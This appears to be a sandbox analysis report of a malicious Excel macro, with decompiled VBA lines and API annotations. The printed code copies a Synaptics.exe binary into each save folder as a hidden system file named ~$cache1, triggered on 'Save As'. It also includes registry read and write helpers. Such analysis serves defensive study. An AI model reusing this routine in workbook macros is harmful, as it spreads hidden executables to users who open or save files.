                        "scripting.filesystemobject"
                        "ALLUSERSPROFILE"
                        LineInstructionMeta Information
                        102

                        Sub SaveAsInj(DIR as String)

                        103

                        Dim FSO as Object

                        104

                        Dim FN as String

                        106

                        Set FSO = CreateObject("scripting.filesystemobject")

                        CreateObject

                        107

                        FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

                        Environ

                        109

                        If FSO.FileExists(FN) Then

                        FileExists

                        110

                        If Not FSO.FileExists(DIR & "\~$cache1") Then

                        FileExists

                        111

                        FileCopy FN, DIR & "\~$cache1"

                        FileCopy

                        112

                        Endif

                        113

                        SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem

                        SetAttr

                        vbHidden

                        vbSystem

                        114

                        Endif

                        115

                        End Sub

                        APIsMeta Information

                        CreateObject

                        RegRead

                        StringsDecrypted Strings
                        "WScript.Shell"
                        LineInstructionMeta Information
                        125

                        Function RegKeyExists(i_RegKey as String) as Boolean

                        126

                        Dim myWS as Object

                        128

                        On Error Goto ErrorHandler

                        129

                        Set myWS = CreateObject("WScript.Shell")

                        CreateObject

                        130

                        myWS.RegRead i_RegKey

                        RegRead

                        131

                        RegKeyExists = True

                        132

                        Exit Function

                        133

                        ErrorHandler:

                        135

                        RegKeyExists = False

                        136

                        End Function

                        APIsMeta Information

                        CreateObject

                        RegRead

                        StringsDecrypted Strings
                        "WScript.Shell"
                        LineInstructionMeta Information
                        117

                        Function RegKeyRead(i_RegKey as String) as String

                        118

                        Dim myWS as Object

                        120

                        On Error Resume Next

                        121

                        Set myWS = CreateObject("WScript.Shell")

                        CreateObject

                        122

                        RegKeyRead = myWS.RegRead(i_RegKey)

                        RegRead

                        123

                        End Function

                        APIsMeta Information

                        CreateObject

                        RegWrite

                        StringsDecrypted Strings
                        "WScript.Shell"
                        LineInstructionMeta Information
                        138

                        Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ")

                        141

                        Dim myWS as Object

                        143

                        Set myWS = CreateObject("WScript.Shell")

                        CreateObject

                        144

                        myWS.RegWrite i_RegKey, i_Value, i_Type

                        RegWrite

                        145

                        End Sub

                        APIsMeta Information

                        Saved

                        LineInstructionMeta Information
                        30

                        Private Sub Workbook_BeforeClose(Cancel as Boolean)

                        31

                        If Not SheetsChanged Then

                        32

                        ActiveWorkbook.Saved = True

                        Saved

                        33

                        Endif

                        34

                        End Sub

                        APIsMeta Information

                        ActiveSheet

                        EnableEvents

                        ScreenUpdating

                        Sheets

                        Sheets

                        xlSheetHidden

                        Save

                        Sheets

                        Sheets

                        xlSheetVisible

                        Select

                        ScreenUpdating

                        EnableEvents

                        EnableEvents

                        ScreenUpdating

                        Sheets

                        Sheets

                        xlSheetHidden

                        GetSaveAsFilename

                        SaveAs

                        xlOpenXMLWorkbookMacroEnabled

                        Part of subcall function SaveAsInj@ThisWorkbook: CreateObject

                        Part of subcall function SaveAsInj@ThisWorkbook: Environ

                        Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                        Part of subcall function SaveAsInj@ThisWorkbook: FileExists

                        Part of subcall function SaveAsInj@ThisWorkbook: FileCopy

                        Part of subcall function SaveAsInj@ThisWorkbook: SetAttr

                        Part of subcall function SaveAsInj@ThisWorkbook: vbHidden

                        Part of subcall function SaveAsInj@ThisWorkbook: vbSystem

                        Path

                        Sheets

                        Sheets

                        xlSheetVisible

                        Select

                        ScreenUpdating

                        EnableEvents

                        StringsDecrypted Strings
                        "Excel \xc7al\x0131\x015fma Kitab\x0131 (*.xlsm), *.xlsm"
                        LineInstructionMeta Information
                        51

                        Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean)

                        52

                        Dim i as Integer

                        53

                        Dim AIndex as Integer

                        54

                        Dim FName

                        56

                        AIndex = ActiveWorkbook.ActiveSheet.Index

                        ActiveSheet

                        58

                        If SaveAsUI = False Then

                        59

                        Cancel = True

                        60

                        Application.EnableEvents = False

                        EnableEvents

                        61

                        Application.ScreenUpdating = False

                        ScreenUpdating

                        63

                        For i = 1 To ActiveWorkbook.Sheets.Count - 1

                        Sheets

                        64

                        ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                        Sheets

                        xlSheetHidden

                        65

                        Next i

                        Sheets

                        66

                        ActiveWorkbook.Save

                        Save

                        68

                        For i = 1 To ActiveWorkbook.Sheets.Count

                        Sheets

                        69

                        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                        Sheets

                        xlSheetVisible

                        70

                        Next i

                        Sheets

                        71

                        ActiveWorkbook.Sheets(AIndex).Select

                        Select

                        72

                        SheetsChanged = False

                        74

                        Application.ScreenUpdating = True

                        ScreenUpdating

                        75

                        Application.EnableEvents = True

                        EnableEvents

                        76

                        Else

                        77

                        Cancel = True

                        78

                        Application.EnableEvents = False

                        EnableEvents

                        79

                        Application.ScreenUpdating = False

                        ScreenUpdating

                        81

                        For i = 1 To ActiveWorkbook.Sheets.Count - 1

                        Sheets

                        82

                        ActiveWorkbook.Sheets(i).Visible = xlSheetHidden

                        Sheets

                        xlSheetHidden

                        83

                        Next i

                        Sheets

                        85

                        FName = Application.GetSaveAsFilename(fileFilter := "Excel \xc7al\x0131\x015fma Kitab\x0131 (*.xlsm), *.xlsm")

                        GetSaveAsFilename

                        86

                        If FName <> False Then

                        87

                        ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled

                        SaveAs

                        xlOpenXMLWorkbookMacroEnabled

                        88

                        SaveAsInj ActiveWorkbook.Path

                        Path

                        89

                        Endif

                        91

                        For i = 1 To ActiveWorkbook.Sheets.Count

                        Sheets

                        92

                        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                        Sheets

                        xlSheetVisible

                        93

                        Next i

                        Sheets

                        94

                        ActiveWorkbook.Sheets(AIndex).Select

                        Select

                        95

                        SheetsChanged = False

                        97

                        Application.ScreenUpdating = True

                        ScreenUpdating

                        98

                        Application.EnableEvents = True

                        EnableEvents

                        99

                        Endif

                        100

                        End Sub

                        APIsMeta Information

                        Sheets

                        ActiveWorkbook

                        Sheets

                        ActiveWorkbook

                        LineInstructionMeta Information
                        44

                        Private Sub Workbook_SheetActivate(ByVal Sh as Object)

                        45

                        If ActiveWorkbook.Sheets.Count <> SheetCount Then

                        Sheets

                        ActiveWorkbook

                        46

                        SheetsChanged = True

                        47

                        SheetCount = ActiveWorkbook.Sheets.Count

                        Sheets

                        ActiveWorkbook

                        48

                        Endif

                        49

                        End Sub

                        LineInstructionMeta Information
                        36

                        Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range)

                        37

                        SheetsChanged = True

                        38

                        End Sub

                        LineInstructionMeta Information
                        40

                        Private Sub Workbook_NewSheet(ByVal Sh as Object)

                        41

                        SheetsChanged = True

                        42

                        End Sub

                        Reset < >